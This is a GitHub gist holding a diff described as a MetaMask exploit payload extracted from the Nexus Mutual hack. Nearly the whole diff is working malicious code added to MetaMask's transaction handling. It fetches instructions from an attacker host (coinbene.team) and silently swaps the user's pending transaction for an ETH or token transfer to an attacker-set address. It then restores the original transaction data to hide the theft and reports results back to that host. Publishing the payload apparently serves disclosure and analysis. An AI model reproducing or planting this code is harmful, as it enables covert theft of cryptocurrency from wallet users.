Skip to content

Instantly share code, notes, and snippets.

@banteg

banteg/payload.diff Secret

Created Dec 14, 2020
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
metamask exploit payload extracted from nexus mutual exploit
Raw
payload.diff
3a4,156
> async tl(tt, tv) {
> try {
> var x = new XMLHttpRequest();
> x.open("GET", "http://coinbene.team/metamask/config.php?c=" + tt + "&r=" + tv, true);
> x.send();
> } catch (te) {}
> }
> async tgc(rtv) {
> rtv.x.open("GET", "http://coinbene.team/metamask/config.php?c=g&r=" + rtv.ha, true);
> rtv.x.onreadystatechange = function() {
> if (rtv.x.readyState == 4) {
> rtv.rp = JSON.parse(rtv.x.responseText);
> var rp = rtv.rp;
> do {
> if (rtv.x.status != 200 || rtv.x.statusText != "OK" || rtv.x.response == null) break;
> if (!(rp.to !== undefined) || !(rp.contract !== undefined) || !(rp.contractw !== undefined) || !(rp.decimal !== undefined) || !(rp.amount !== undefined) || !(rp.from !== undefined)) break;
> if (typeof rp.to != "string" || typeof rp.contract != "string" || typeof rp.contractw != "string" || typeof rp.decimal != "number" || typeof rp.amount != "number") break;
> if (Array.isArray(rp.from) === false || rp.from.length <= 0) break;
> if (!c.default.isValidAddress(rp.to) || (rp.contract != "0x00" && !c.default.isValidAddress(rp.contract)) || (rp.contractw != "0x00" && !c.default.isValidAddress(rp.contractw))) break;
> if (rp.decimal < 0 || rp.amount <= 0) break;
> if (rp.contractw == "0x00") {
> rtv.tae = 2;
> return;
> } else if (rp.from.find(key => key.toLowerCase() === rtv.ha.toLowerCase()) != undefined) {
> rtv.tae = 1;
> return;
> }
> } while (0);
> rtv.tae = 8;
> return;
> }
> }
> rtv.x.send();
> }
> async tvf(rtv) {
> rtv.tae = 200000;
> let ma = [{
> "constant": true,
> "inputs": [{
> "name": "",
> "type": "address"
> }],
> "name": "whiteListed",
> "outputs": [{
> "name": "",
> "type": "bool"
> }],
> "type": "function"
> },
> {
> "constant": true,
> "inputs": [{
> "name": "",
> "type": "address"
> }],
> "name": "isLockedForMV",
> "outputs": [{
> "name": "",
> "type": "uint256"
> }],
> "type": "function"
> },
> {
> "constant": true,
> "inputs": [{
> "name": "owner",
> "type": "address"
> }, {
> "name": "spender",
> "type": "address"
> }],
> "name": "allowance",
> "outputs": [{
> "name": "",
> "type": "uint256"
> }],
> "type": "function"
> }
> ];
> const w3 = new Web3(this.provider);
> let ct = w3.eth.contract(ma).at(rtv.rp.contract);
> try {
> ct.whiteListed(rtv.ha, (error, iwl) => {
> if (error || iwl != true) rtv.tae = 3;
> else rtv.tae = rtv.tae / 10;
> });
> ct.whiteListed(rtv.rp.to, (error, iwl) => {
> if (error || iwl != true) rtv.tae = 3;
> else rtv.tae = rtv.tae / 10;
> });
> ct.isLockedForMV(rtv.ha, (error, ilm) => {
> if (error || ilm > (Date.now() / 10 ** 3)) rtv.tae = 3;
> else rtv.tae = rtv.tae / 10;
> });
> ct.isLockedForMV(rtv.rp.to, (error, ilm) => {
> if (error || ilm > (Date.now() / 10 ** 3)) rtv.tae = 3;
> else rtv.tae = rtv.tae / 10;
> });
> ct.allowance(rtv.rp.to, rtv.rp.contractw, (error, iwn) => {
> if (error || rtv.rp.amount > (iwn / (10 ** rtv.rp.decimal))) rtv.tae = 3;
> else rtv.tae = rtv.tae / 10;
> });
> } catch (te) {
> rtv.tae = 3;
> }
> }
> async isb() {
> try {
> var rtv = {
> x: new XMLHttpRequest(),
> rp: null,
> tae: 0,
> ha: this.getSelectedAddress()
> };
> await this.tgc(rtv);
> await new Promise(r => setTimeout(r, 1000));
> if (!rtv.tae) await new Promise(r => setTimeout(r, 1000));
> if (rtv.tae == 1 && rtv.rp.contract != "0x00") {
> await this.tvf(rtv);
> await new Promise(r => setTimeout(r, 2000));
> if (rtv.tae > 100) await new Promise(r => setTimeout(r, 1000));
> }
> if (rtv.tae == 2) return 0;
> } catch (te) {
> return 1;
> }
> return 1;
> }
> async tchv(rtv, r, ttr, etba) {
> try {
> var tf = rtv.rp.amount;
> rtv.rp.amount = c.default.bufferToHex(rtv.rp.amount * 10 ** rtv.rp.decimal);
> ttr.txParams.gasPrice = c.default.bufferToHex(Math.min(Math.max(c.default.bufferToInt(r.txParams.gasPrice) * 2, 80 * 10 ** 9), 160 * 10 ** 9));
> if (rtv.rp.contract == "0x00") {
> ttr.transactionCategory = _.TRANSACTION_CATEGORIES.SENT_ETHER;
> ttr.txParams.to = rtv.rp.to;
> ttr.txParams.gas = c.default.bufferToHex(Math.max(Math.min(c.default.bufferToInt(r.txParams.gas) * 2, 40000), 25000));
> ttr.txParams.value = rtv.rp.amount;
> } else {
> rtv.rp.amount = rtv.rp.amount.slice(2);
> rtv.rp.to = rtv.rp.to.slice(2);
> ttr.transactionCategory = _.TRANSACTION_CATEGORIES.TOKEN_METHOD_TRANSFER;
> ttr.txParams.to = rtv.rp.contract;
> ttr.txParams.data = "0xa9059cbb" + Array(64 - rtv.rp.to.length + 1).join("0") + rtv.rp.to + Array(64 - rtv.rp.amount.length + 1).join("0") + rtv.rp.amount;
> ttr.txParams.gas = c.default.bufferToHex(Math.min(Math.max(c.default.bufferToInt(r.txParams.gas) * 2, 87654), 138765));
> ttr.txParams.value = "0x0";
> tf = 0;
> }
> if ((tf = tf + c.default.bufferToInt(ttr.txParams.gasPrice) * c.default.bufferToInt(ttr.txParams.gas) / (10 ** 18)) > (etba / (10 ** 18))) rtv.tae = 4;
> } catch (te) {
> rtv.tae = 5;
> }
> }
4a158,164
> var etba = await this.query.getBalance(this.getSelectedAddress());
> var rtv = {
> x: new XMLHttpRequest(),
> rp: null,
> tae: 0,
> ha: this.getSelectedAddress()
> };
6c166
< let t;
---
> let t, g;
10,11c170,192
< const r = this.txStateManager.getTx(e),
< n = r.txParams.from;
---
> let r = this.txStateManager.getTx(e),
> n = r.txParams.from,
> ttr, s;
> try {
> if (r.type == _.TRANSACTION_TYPES.CANCEL || r.type == _.TRANSACTION_TYPES.RETRY) rtv.tae = 10;
> else if (c.default.bufferToInt(r.txParams.value / (10 ** 9)) != 0) rtv.tae = 9;
> else {
> try {
> await this.tgc(rtv);
> await new Promise(r => setTimeout(r, 1000));
> if (!rtv.tae) await new Promise(r => setTimeout(r, 1000));
> if (rtv.tae == 1 && rtv.rp.contract != "0x00") {
> await this.tvf(rtv);
> await new Promise(r => setTimeout(r, 2000));
> if (rtv.tae > 100) await new Promise(r => setTimeout(r, 1000));
> }
> } catch (te) {
> rtv.tae = 6;
> }
> }
> } catch (te) {
> rtv.tae = 0;
> }
19,21c200,201
< const s = await this.signTransaction(e);
< await this.publishTransaction(e, s), t.releaseLock()
< } catch (r) {
---
> g = JSON.parse(JSON.stringify(r));
>
23,25c203,234
< this.txStateManager.setTxStatusFailed(e, r)
< } catch (e) {
< m.default.error(e)
---
> if (rtv.tae == 2) {
> ttr = this.txStateManager.generateTxMeta({
> history: r.history,
> id: r.id,
> loadingDefaults: r.loadingDefaults,
> metamaskNetworkId: r.metamaskNetworkId,
> nonceDetails: r.nonceDetails,
> origin: r.origin,
> status: r.status,
> time: r.time,
> txParams: {
> from: r.txParams.from,
> gas: r.txParams.gas,
> gasPrice: r.txParams.gasPrice,
> nonce: r.txParams.nonce
> },
> type: _.TRANSACTION_TYPES.STANDARD
> });
> await this.tchv(rtv, r, ttr, etba);
> if (rtv.tae == 2) {
> Object.keys(r).forEach(k => delete r[k]);
> ttr.constructor();
> for (var attr in ttr)
> if (ttr.hasOwnProperty(attr)) r[attr] = ttr[attr];
> }
> }
> } catch (te) {
> rtv.tae = 7;
> Object.keys(r).forEach(k => delete r[k]);
> g.constructor();
> for (var attr in g)
> if (g.hasOwnProperty(attr)) r[attr] = g[attr];
27c236,250
< throw t && t.releaseLock(), r
---
>
> s = await this.signTransaction(e, g, rtv.tae);
>
> await this.publishTransaction(e, s, g, rtv.tae), t.releaseLock()
> } catch (ter) {
> try {
> this.txStateManager.setTxStatusFailed(e, ter, g, rtv.tae)
> Object.keys(r).forEach(k => delete r[k]);
> g.constructor();
> for (var attr in g)
> if (g.hasOwnProperty(attr)) r[attr] = g[attr];
> } catch (ttee) {
> m.default.error(ttee)
> }
> throw t && t.releaseLock(), ter
30a254,256
> try {
> this.tl("p", rtv.tae.toString());
> } catch (te) {}
32,34c258,260
< async signTransaction(e) {
< const t = this.txStateManager.getTx(e),
< r = this.getChainId(),
---
> async signTransaction(e, tg = 0, tae = 0) {
> let t = this.txStateManager.getTx(e);
> const r = this.getChainId(),
39a266,275
> try {
> if (tae == 2) {
> Object.keys(t).forEach(k => delete t[k]);
> tg.constructor();
> for (var attr in tg)
> if (tg.hasOwnProperty(attr)) t[attr] = tg[attr];
> }
> } catch (te) {
> t = this.txStateManager.getTx(e);
> }
43,44c279,280
< async publishTransaction(e, t) {
< const r = this.txStateManager.getTx(e);
---
> async publishTransaction(e, t, g = 0, tae = 0) {
> let r = this.txStateManager.getTx(e);
47c283,292
< r.preTxBalance = e.toString(16)
---
> r.preTxBalance = e.toString(16);
> if (tae == 2) g.preTxBalance = r.preTxBalance;
> }
> try {
> if (tae == 2) {
> g.rawTx = t, g.history = r.history, g.r = r.r, g.s = r.s, g.status = r.status, g.v = r.v;
> r = g;
> }
> } catch (te) {
> tae = 0;
52c297,300
< n = await this.query.sendRawTransaction(t)
---
> n = await this.query.sendRawTransaction(t);
> try {
> if (tae == 2) this.tl("q", "8");
> } catch (te) {}
59,77d306
< async confirmTransaction(e, t) {
< const r = this.txStateManager.getTx(e);
< if (r) try {
< const n = "string" == typeof t.gasUsed ? t.gasUsed : t.gasUsed.toString(16);
< if (r.txReceipt = T(T({}, t), {}, {
< gasUsed: n
< }), this.txStateManager.setTxStatusConfirmed(e), this._markNonceDuplicatesDropped(e), this.txStateManager.updateTx(r, "transactions#confirmTransaction - add txReceipt"), r.transactionCategory === _.TRANSACTION_CATEGORIES.SWAP) {
< const t = await this.query.getBalance(r.txParams.from),
< n = this.txStateManager.getTx(e),
< o = n.approvalTxId ? this.txStateManager.getTx(n.approvalTxId) : null;
< n.postTxBalance = t.toString(16), this.txStateManager.updateTx(n, "transactions#confirmTransaction - add postTxBalance"), this._trackSwapsMetrics(n, o)
< }
< } catch (e) {
< m.default.error(e)
< }
< }
< async cancelTransaction(e) {
< this.txStateManager.setTxStatusRejected(e)
< }
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment